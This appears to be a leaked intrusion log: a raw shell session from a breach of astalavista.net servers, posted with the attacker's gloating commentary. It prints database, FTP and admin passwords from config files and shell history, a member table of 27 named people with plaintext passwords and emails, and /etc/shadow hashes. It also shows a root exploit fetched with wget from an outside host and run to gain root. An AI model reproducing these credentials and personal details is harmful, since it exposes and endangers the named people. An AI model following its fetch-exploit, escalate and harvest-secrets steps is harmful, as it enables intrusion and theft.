4096 Sep 21 2006 wiki sh-3.2$ head -20 index.php <?PHP /** * Mainfile (external) for astalavistaNET
v2.0 * * @copyright Astalavista IT Engineering GmbH * @author Thomas Kaelin
<thomas.kaelin@astalavista.ch> * @version 1.0 */ if ($_SERVER['PHP_SELF'] == '/webcash.php') {
$dontStartSession = false; } else { $dontStartSession = true; }
require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php'); sh-3.2$ cd config sh-
3.2$ ls -la total 32 drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 . drwxr-x--- 29 astanet apache 4096
Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php -rw-r--r-- 1 astanet astanet
4937 Dec 23 15:48 com.conf.php -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php -rw-r--r-- 1
astanet astanet 1668 Aug 20 2008 ext.conf.php -rw-r--r-- 1 astanet astanet 2724 May 30 2007
int.conf.php sh-3.2$ cat com.conf.php [snip] //member-database $_CONFIG['db_mem_server'] =
'localhost'; $_CONFIG['db_mem_database'] = 'astanet_membersystem'; $_CONFIG['db_mem_user'] =
'astanet_db'; $_CONFIG['db_mem_password'] = 'TXwVrC7hbq'; $_CONFIG['db_mem_debug'] = false;
//true or false //ads-database $_CONFIG['db_ads_server'] = 'localhost'; $_CONFIG['db_ads_database'] =
'astanet_ads'; $_CONFIG['db_ads_user'] = 'astanet_db'; $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
$_CONFIG['db_ads_debug'] = false; //true or false //rainbow-database $_CONFIG['db_rainbow_server']
= '212.254.194.163'; $_CONFIG['db_rainbow_database'] = 'rainbow'; $_CONFIG['db_rainbow_user'] =
'dinu'; $_CONFIG['db_rainbow_password'] = 'dinudinu'; $_CONFIG['db_rainbow_debug'] = false; //true
or false //mailing lists database $_CONFIG['db_mailing_lists_server'] = 'localhost';
$_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists'; $_CONFIG['db_mailing_lists_user'] =
'astanet_db'; $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mailing_lists_debug'] = false; //true or false //paypal $_CONFIG['sub_pp_url'] =
'https://www.paypal.com/cgi-bin/webscr'; $_CONFIG['sub_pp_cmd'] = '_xclick';
$_CONFIG['sub_pp_business'] = 'info@astalavista.net'; $_CONFIG['sub_pp_noship'] = '1';
$_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/'; [snip] sh-3.2$ cd .. sh-3.2$ cd member sh-
3.2$ ls -la total 20 drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 . drwxr-x--- 29 astanet apache 4096
Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess -rwxr-xr-x 1 astanet astanet 6709 Jan
13 14:06 index.php sh-3.2$ cat .htaccess SecFilterEngine off sh-3.2$ cd .. sh-3.2$ cd cron sh-3.2$ ls -la
total 168 drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58
.. -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php -rw-r--r-- 1 astanet astanet 2356 Aug 11
2006 0_functions.php -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php -rw-r--r-- 1 astanet
astanet 527 Aug 11 2006 1_fivemin.php -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php -
rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006
2_advertising.php -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php -rw-r--r-- 1 astanet
astanet 3784 Aug 16 2006 2_awstats.sh -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51
2_expire.bak.php -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php -rw-r--r-- 1 astanet
astanet 7657 Aug 15 2006 2_exploitree_updater.php -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31
2_filesize.sh -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php -rw-r--r-- 1 astanet
astanet 15664 Sep 22 2006 2_keywords.php -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006
2_proxy_checker.php -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php -rw-r--r-- 1
astanet astanet 796 Aug 11 2006 99_create_emails.php drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006
99_lang_email -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php -rw-r--r-- 1 astanet
astanet 9620 Jan 6 16:05 login_reminder_test.php sh-3.2$ cd .. sh-3.2$ cd _007 sh-3.2$ ls -la total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--
r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php -
rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006
sitemap sh-3.2$ cat .htaccess authType Basic authName Admin authUserFile
/home/astanet/auth/.htadm_pwd require valid-user sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT sh-3.2$ mysql -u astanet_db -p Enter password: Welcome to the MySQL
monitor. Commands end with ; or \g. Your MySQL connection id is 275153 Server version: 5.0.45-
community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases; +-----------------------+ | Database | +-----------------------+ | information_schema | |
astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | | astanet_membersystem | | test | +------
-----------------+ 6 rows in set (0.00 sec) mysql> use astanet_membersystem Database changed mysql>
show tables; +-----------------------------------+ | Tables_in_astanet_membersystem | +-----------------------------
------+ | blacklist_categories | | blacklist_content | | blacklist_levels | | blacklist_mcset | |
dir_categories | | dir_comments | | dir_links | | dir_temp | | dir_votes | | documents | |
documents_categories | | email_content | | email_settings | | exploits | | exploits_categories | |
exploittree_categories | | exploittree_exploits | | home_values | | iso_countries | | links_categories | |
links_records | | links_unauth | | links_votes | | log | | news_categories | | news_comments | |
news_emoticons | | news_latest | | news_messages | | news_statistics | | news_votes | |
prices_content | | prices_offers | | rss_settings | | sessions | | stats_signups | | u2u2 | | u2u_contact |
| u2u_settings | | user_keywords_selected_categories | | users | | users_ipn_test | |
users_keyword_values | | users_profile | | users_temp | | users_upgrade | +-----------------------------------
+ 46 rows in set (0.00 sec) mysql> describe users; +--------------------------+--------------------------------------+----
--+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +--------------------------
+--------------------------------------+------+-----+---------------------+----------------+ | primary_key | smallint(5)
unsigned | NO | PRI | NULL | auto_increment | | user | varchar(50) | NO | | | | | nickname |
varchar(30) | NO | MUL | anonymous | | | password | varchar(30) | NO | | | | | userlevel | tinyint(3) |
YES | MUL | NULL | | | exp | int(8) unsigned | NO | | 0 | | | email | varchar(50) | NO | | | | | ip |
varchar(15) | NO | | 0 | | | proxy | set('0','1') | NO | | 0 | | | logtime | timestamp | NO | |
CURRENT_TIMESTAMP | | | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | | |
anz_in | tinyint(1) | NO | | -1 | | | status | tinyint(1) unsigned | NO | | 0 | | | checked | set('0','1','2') |
NO | | 0 | | | freemember | set('0','1') | NO | | 0 | | | ordertype | set('transfer','wp','pp','mc','CnB') |
YES | | NULL | | | lang | tinytext | NO | | | | | adid | smallint(6) | NO | | 0 | | | pp_txn_id |
varchar(255) | YES | | NULL | | | cnb_transaction_id | varchar(255) | YES | | NULL | | | cnb_order_id |
varchar(255) | YES | | NULL | | | cnb_user_id | int(11) | YES | | 0 | | +--------------------------+-----------------
---------------------+------+-----+---------------------+----------------+ 22 rows in set (0.01 sec) mysql> select
count(*) as skids from users; +-------+ | skids | +-------+ | 25199 | +-------+ 1 row in set (0.00 sec) mysql>
select user,nickname,password,email from users where userlevel = 1; +--------------------------+----------------
------+------------------+-----------------------------------+ | user | nickname | password | email | +-------------------
-------+----------------------+------------------+-----------------------------------+ | pascal | prozac | astaman3 |
info@astalavista.net | | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com | |
qreymer | Palermo | qblsw85iam | eche@home.se | | Christian Wehrli | g0atherd | hitt?74 |
g0atherd@gmx.net | | Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk | | Martin Wyss | dinu
| kj63;cXy | martin.wyss@astalavista.net | | Leandro Nery | Timan_no_Sanco | nery2002 |
leandronery@hotmail.com | | shaving ryans privates | ShavingRyansPrivates | memberboard313 |
shavingryansprivates1@hotmail.com | | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 |
spoofedexistence@hotmail.com | | David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
| David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net | | Thomas Kalin | Gwanun | QwErTy123 |
thomas.kaelin@astalavista.net | | Marcus unknown | Cra58cker | hhCr4ck06 |
unknownmarcus@hotmail.com | | David Ellis | dellis203 | philip | dellis@nightwatchnss.com | | Lars
Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com | | Paulo Santos | Be1er0ph0r1 | amor01 |
pmsantos@gmx.ch | | Thomas D?ppen | daha | asta4tom | thomas.daeppen@astalavista.ch | | Touraj
Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com | | Fabius Bernet | traviser |
wellenreiter100 | fabius.bernet@astalavista.ch | | Zachary McElroy | duder1 | dirty245dix |
mcelroyzj@yahoo.com | | Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com | | Beatriz
Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com | | Glafkos Charalambous |
anonymous2086 | si99490178$# | nowayout@webhostline.com | | developer COMVATION |
anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch | | Peter Fisher | cyph3r1 |
testZer025435 | cyph3r@astalavista.com | | sykadul | sykadul | ak29eral | sykadul@gmail.com | |
Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch | +--------------------------+-----------
-----------+------------------+-----------------------------------+ 27 rows in set (0.00 sec) mysql> exit; Bye [~]
plaintext passwords? yes, Those so called "security professionals" who charge you $6.66 / month to
register at their hack-proof portal, save your passwords in plaintext... brilliant! [~] This been fun but we
want more. sh-3.2$ uname -a Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7
10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux sh-3.2$ wget http://anti.sec.labs/g0troot --
13:33:37-- http://anti.sec.labs/g0troot Resolving anti.sec.labs... 13.33.33.37 Connecting to
anti.sec.labs|13.33.33.37|:80... connected. HTTP request sent, awaiting response... 200 OK Length:
18200 (18K) [text/plain] Saving to: `g0troot'
100%[================================================================================
=========================================================>] 18,200 58.6K/s in 0.3s 18:55:14
(58.6 KB/s) - `g0troot' saved [18200/18200] sh-3.2$ ./g0troot -i x86_64 [+] g0troot - anti.sec.labs [+]
Target: 2.6.18-128.1.10.el5 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] [+] r00tr00t [~]
Executing shell... sh-3.2# id uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# cat /etc/shadow
root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7::: [snip]
admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7::: sh-3.2# cat /etc/motd
##################################################### #____ ____ ___ ____ _ ____ _ _ _
____ ___ ____ # # |__| [__ | |__| | |__| | | | [__ | |__| # # | | ___] | | | |___ | | \/ | ___] | | | # # #
##################################################### # # # Admin Contact -
support@secureservertech.com # # # # Available ShortCuts # # # # nst - list active connections # # ddos -
shows how many times each ip is connected # # ltr - restart the webserver # # phpc - edit the php config
file # # htc - edit the webserver configuration file # # up - uptime # # etd - edit the motd of the day file #
# htr - start and restart apache if needed # # syng - shows active SYN_RECV connections # # synd - syn
flood blocker - "synd -h" for usage # ##################################################### #
NOTES: # # Last Upgrade - 12-08-2008 by JF # # My.cnf/Mysql Optimization - 1-28-09 # # # # # # #
##################################################### sh-3.2# lastlog | grep -v Never
Username Port From Latest root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009 admin pts/1
cp.secureservert Thu Mar 20 10:25:39 +0000 2008 com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000
2009 astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 sh-3.2# ls -la total 453376 drwxr-x-
-- 15 root root 4096 Jun 4 08:40 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. -rw-r--r-- 1 root root
2394400 Oct 19 2007 10mbtest.zip -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg -rw------- 1
root root 16836 Jun 4 07:21 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1
root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rwx------ 1 root root
1899 Oct 28 2007 bk.sh -rw-r--r-- 1 root root 1327 Nov 29 2007 cert -rw-r--r-- 1 root root 139860821
May 14 2008 contrexxbackup_20080514.sql drwxr-xr-x 4 root root 4096 May 20 2008 .cpan -rw-r--r-- 1
root root 100 Jan 6 2007 .cshrc -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql drwx------ 2
root root 4096 Oct 28 2007 .elinks drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1 -rw-r--r-- 1 root
root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 -rw------- 1 root root 0 Apr 16 13:19 .history -rw-r--r-- 1
root root 16095 Sep 11 2007 install.log -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog -rw-r--r--
1 root root 1003 Jul 22 2007 install.sh -rw------- 1 root root 35 Jun 2 14:23 .lesshst drwxr-xr-x 2 root root
4096 Dec 29 2007 .lftp drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec -rw-r--r-- 1 root
root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-
2.6.22.tar.bz2 -rwx------ 1 root root 760 Sep 18 2008 lp drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-
3.3.1 -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz -rw-r--r-- 1 root root
6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1 drwxr-xr-x 12 root root 4096 Mar 21 2008
lsws-3.3.9 -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz drwxr-xr-x 12
root root 4096 May 29 15:10 lsws-4.0.3 -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-
x86_64-linux.tar.gz -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh -rw------- 1 root root 41 Oct 19
2007 .my.cnf -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history -rwx------ 1 root root 38873 Apr 16
2008 mysqlreport -rw------- 1 root root 41 May 20 2008 .mytop drwxr-xr-x 3 1000 1000 4096 May 20
2008 mytop-1.6 -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz drwxr-xr-x 2 root root 4096
Oct 28 2007 .ncftp -rw------- 1 root root 1462 Sep 21 2007 opt.php -rw-r--r-- 1 root root 3371 Sep 22
2007 p -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2 -rw------- 1 root root 1024 Feb 3
21:32 .rnd -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr -rw-r--r-- 1 root root 887 Nov 28 2007
server.key drwx------ 2 root root 4096 Oct 10 2008 .ssh -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-
backup.dat -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc -rw-r--r-- 1 root root 104874307 Oct 17 2007
test100.zip -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1 drwxr-xr-x 2 root root 4096 Apr 29
11:15 tmp -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh drwxrwxrwx 19 1000 users 4096
Mar 21 2008 valgrind-3.3.0 -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2 -rw------- 1
root root 12997 May 16 2008 .viminfo sh-3.2# cat .bash_history [snip] wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz cd linux-2.6.27.10 sh install.sh make bzImage ; make modules ; make
modules_install ; make install make clean service mysqld restart [snip] cd /usr/sbin/ chmod 4777
traceroute chmod 4777 ping traceroute -I www.astalavista.ch [snip] vi /etc/csf/csf.conf traceroute
google.ch service csf restart tracert google.ch service csf restart traceroute www.google.ch tracert
www.google.ch traceroute www.google.ch locate traceroute chown 4755 /bin/traceroute chown 4777
/bin/traceroute locate ping chown 4755 /bin/ping chown 4777 /bin/ping cd /bin/ ls -ali | grep ping
chown root ping chmod 4755 ping ls -ali | grep traceroute chown root traceroute chmod 4755
traceroute ls -ali | grep traceroute traceroute -I www.google.ch traceroute www.google.ch whois
pmsantos.ch [snip] mysql -h com_contrexx2_live < /root/defaultp_ports.sql mysql -h -ucontrexxuser2 -
p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql mysql -h -u contrexxuser2 -p
com_contrexx2_live < /root/defaultp_ports.sql mysql -h localhost com_contrexx2_live <
/root/defaultp_ports.sql top ping ssth.ch ping asdlkfaljgasd???ljg???lasj.ch ping asdlkfaljgasdlasj.ch ping
www.ssth.ch ping ssth.ch nslookup www.google.ch nslookup www.ssth.ch man nslookup ping
www.google.ch nslookup www.google.ch nslookup www.google.ch nslookup salfjasdlf.ch [snip] openssl
passwd -1 sadf openssl passwd -1 5cZNHstdTy mysql mysql locate proftp vi /etc/proftpd.passwd service
proftpd restart locate proftpd.conf vi /etc/proftpd.conf vi /etc/proftpd.passwd service proftpd restart
[snip] /bin/sh /home/com/backup_system/backup.sh tar cfv /home/com/backups/09-04-28_backup.tar
/home/com/public_html/admin mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql mysqldump -h localhost -u contrexxuser2 --
password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql ls -ali mysqldump -h
localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-
full.sql mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-
ideapool-full.sql crontab -l crontab -l php -q
/home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh wget
http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz tar zxvf lsws-4.0.3-ent-
x86_64-linux.tar.gz cd lsws-4.0.3 sh install.sh uptime hdparm -tt /dev/sda iostat yum install iostat iostat
whereis iostat yjm clean all yum clean all ; yum -y update iostat yum install systat rpm -qa | grep iostat
rpm -qa | grep sysstat rpm -qa | grep systat dmesg -c sysctl -p uname -r cd /usr/src wget
nix101.com/kernels/sstlinux.tar.gz shutdown -r now nano -w /boot/grub/grub.conf sh-3.2# cat .my.cnf
[client] user=da_admin password=X9dctmRH sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh ##################################################################### # # #
incremental backup for astalavista.com # # # # author: Paulo M. Santos <paulo.santos@astalavista.com>
# # # ##################################################################### [snip]
PROG_DIR="/home/com/backup_system"; BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html"; # ftp for synology backup
server FTP_HOST="212.254.194.163"; FTP_PORT="21"; FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V"; FTP_DIR="/astalavista.com"; # database
DB_HOST="localhost"; DB_USER="contrexxuser2"; DB_PASS="0fEYNZgXz1pKe";
DB_DATABASE1="com_contrexx2_live"; DB_DATABASE2="com_contrexx2"; [snip] ftp -in $FTP_HOST
$FTP_PORT <<EOF quote USER $FTP_USER quote PASS $FTP_PASS cd $FTP_DIR put $DB_FULLNAME-
SQL_Dump.tar put $BACKUP_FULLNAME-Public_HTML.tar close bye EOF sh-3.2# cd /home sh-3.2# ls -la
total 120 drwxr-xr-x 14 root root 4096 Mar 11 17:56 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwx--
x--x 9 admin admin 4096 Nov 28 2007 admin -rw------- 1 root root 8192 Jun 4 03:03 aquota.group -rw-----
-- 1 root root 8192 Jun 3 02:45 aquota.user drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet drwxr-
xr-x 2 root root 4096 Jul 29 2008 backup drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 drwx--x-
-x 10 com com 4096 Apr 28 12:40 com drwxr-xr-x 2 root root 4096 May 17 2007 ftp drwx------ 3 jon jon
4096 Sep 21 2007 jon drwx------ 2 root root 16384 Sep 11 2007 lost+found drwxr-xr-x 2 root root 4096
Sep 14 2007 my drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata drwx------ 2 jon jon 4096 Sep 15
2007 test drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp sh-3.2# cd admin sh-3.2# ls -la total 1735896
drwx--x--x 9 admin admin 4096 Nov 28 2007 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. drwxrwxr-x 2
admin admin 4096 Oct 25 2007 admin_backups drwx------ 2 admin admin 4096 Sep 28 2007 backups -
rw------- 1 admin admin 860 Sep 17 2008 .bash_history -rw-r--r-- 1 admin admin 24 Sep 14 2007
.bash_logout -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile -rw-r--r-- 1 admin admin 124 Sep
14 2007 .bashrc drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups drwx--x--x 6 admin admin 4096
Sep 21 2007 domains drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap -rw-r--r-- 1 root root 24 Sep 21
2007 info.php drwx------ 2 admin admin 4096 Sep 21 2007 mail -rw-r--r-- 1 root root 716 Nov 28 2007
server.csr -rw-r--r-- 1 root root 887 Nov 28 2007 server.key -rw-r----- 1 admin mail 34 Sep 14 2007
.shadow -rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz drwx--x--x 2 admin
admin 4096 Jul 29 2008 user_backups sh-3.2# .. sh-3.2# cd jon sh-3.2# ls -la total 36 drwx------ 3 jon jon
4096 Sep 21 2007 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. -rw------- 1 jon jon 53 Sep 21 2007
.bash_history -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout -rw-r--r-- 1 jon jon 176 Sep 21 2007
.bash_profile -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html sh-3.2# cd .. sh-3.2# cd test sh-3.2# ls -la total 48
drwx------ 2 jon jon 4096 Sep 15 2007 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. -rw------- 1 jon jon
79 Sep 21 2007 .bash_history -rw-r--r-- 1 jon jon 24 Sep 15 2007 .bash_logout -rw-r--r-- 1 jon jon 176 Sep
15 2007 .bash_profile -rw-r--r-- 1 jon jon 124 Sep 15 2007 .bashrc sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67 sh-3.2# cd .. sh-3.2# cd astanet sh-3.2# ls -la total
52 drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. drwxr-xr-
x 2 root root 4096 Dec 23 16:00 auth -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history -rw-r--
r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50
.bash_profile -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc drwx--x--x 3 astanet astanet 4096 Dec
23 12:18 domains drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap drwx------ 2 astanet astanet 4096
Dec 23 12:18 mail -rw------- 1 astanet astanet 197 Jun 4 09:51 .mysql_history lrwxrwxrwx 1 astanet
astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html -rw-r----- 1 astanet mail
34 Dec 22 12:41 .shadow sh-3.2# cd auth/ sh-3.2# ls -la total 28 drwxr-xr-x 2 root root 4096 Dec 23
16:00 . drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .. -rw-r--r-- 1 root root 321 Jan 5 2006
hackercontest.config.inc.php -rw-r--r-- 1 root root 319 Jan 5 2006 hosting.config.inc.php -rw-r--r-- 1 root
root 24 Jun 4 09:38 .htadm_pwd -rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting -rw-r--r-- 1
root root 51 Oct 11 2006 .htwebalizer_pwd sh-3.2# cat hackercontest.config.inc.php <?PHP // Variabeln
f?r Verbindung zur Datenbank // $conxHost = 'localhost'; // MySQL hostname $conxUser =
'hackercontest'; // MySQL user $conxPassword = 'K6m@7dUc'; // MySQL password $bfkey = 'cXvB3981';
// Encryption/Decryption Key for Blowfish ?> sh-3.2# cat hosting.config.inc.php <?PHP // Variabeln f?r
Verbindung zur Datenbank // $conxHost = 'localhost'; // MySQL hostname $conxUser = 'hostinguser'; //
MySQL user $conxPassword = 'cXvB3981'; // MySQL password $bfkey = 'cXvB3981'; //
Encryption/Decryption Key for Blowfish ?> sh-3.2# cd .. sh-3.2# cd com sh-3.2# ls -la total 141208 drwx--
x--x 10 com com 4096 Apr 28 12:40 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. drwx------ 2 com com
4096 Jun 4 04:04 backups -rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql drwxr-xr-x 2 com com
4096 May 12 15:20 backup_system -rw------- 1 com com 21880 Jun 2 08:07 .bash_history -rw-r--r-- 1
com com 24 Sep 24 2007 .bash_logout -rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile -rw-r--r-- 1
com com 124 Sep 24 2007 .bashrc drwx--x--x 3 com com 4096 Jan 29 2008 domains -rw-r--r-- 1 com com
16409 Jul 16 2008 FWUser.class.php.fixed drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap -rw------- 1 com
com 69 Nov 18 2008 .lesshst drwx------ 2 com com 4096 Sep 24 2007 mail -rw------- 1 com com 13970
Mar 28 21:42 .mysql_history drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp lrwxrwxrwx 1 com com 37
Sep 24 2007 public_html -> ./domains/astalavista.com/public_html -rw-r----- 1 com mail 34 Sep 24 2007
.shadow drwx------ 2 com com 4096 Aug 26 2008 .ssh -rwx------ 1 com com 8515 Feb 10 2008 t -rw-rw-r--
1 com com 6265 Feb 11 2008 t.c drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp -rw-rw-r-- 1 com com
617 May 20 2008 .toprc -rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup-20080519-
0900.sql -rw------- 1 com com 16629 Mar 28 21:46 .viminfo -rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc
sh-3.2# head t.c /* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema
co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj
jakesyk rozbite. * * Linux vmsplice Local Root Exploit * By qaaz * sh-3.2# cd / sh-3.2# ls -la total 360
drwxr-xr-x 25 root root 4096 Jun 3 02:43 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. -rw------- 1 root
root 10240 Jun 3 02:39 aquota.group -rw------- 1 root root 10240 Jun 3 02:39 aquota.user -rw-r----- 1
root root 819 Jul 17 2008 astalavista.us.db -rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck -rw-r--r-- 1 root
root 0 Sep 16 2007 .autorelabel drwxr-xr-x 3 root root 4096 Dec 29 2007 backup drwxr-xr-x 2 root root
4096 Jun 4 04:03 bin drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot drwxr-xr-x 11 root root 3620 Jun 3
02:43 dev drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc drwxr-xr-x 14 root root 4096 Mar 11 17:56
home -rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64 drwx------ 2 root root 16384 Sep 11 2007 lost+found drwxr-
